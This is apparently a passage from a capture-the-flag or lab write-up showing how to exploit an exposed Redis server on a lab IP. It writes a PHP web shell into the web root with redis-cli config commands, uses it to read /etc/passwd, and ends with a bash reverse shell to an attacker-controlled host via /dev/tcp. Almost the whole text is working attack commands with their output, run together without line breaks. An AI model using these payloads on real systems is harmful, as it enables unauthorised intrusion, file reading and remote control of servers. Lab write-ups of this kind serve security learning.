redis-cli -h 10.10.60.15910.10.60.159:6379> config set dir /var/www/htmlOK10.10.60.159:6379> config set dbfilename redis.phpOK10.10.60.159:6379> set test "<?php phpinfo(); ?>"OK10.10.60.159:6379> saveOK
Now in Firefox, navigate to <target-ip>/redis.php
If it is shown the phpinfo() file, the try to run this to get a shell:
redis-cli -h 10.10.60.15910.10.60.159:6379> config set dir /var/www/htmlOK10.10.60.159:6379> config set dbfilename redisshell.phpOK10.10.60.159:6379> set test "<?php system($_GET['cmd']); ?>"OK10.10.60.159:6379> saveOK
Now on the web-nav put something like this: view-source:http://10.10.60.159/redisshell.php?cmd=%20cat%20/etc/passwd
Now set up a listener and create a simple reverse php shell:
redis-cli -h 10.10.60.15910.10.60.159:6379> config set dir /var/www/htmlOK10.10.60.159:6379> config set dbfilename redisshell.phpOK10.10.60.159:6379> set test "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/<attck-ip>/<port> 0>&1'\"); ?>"OK10.10.60.159:6379> saveOK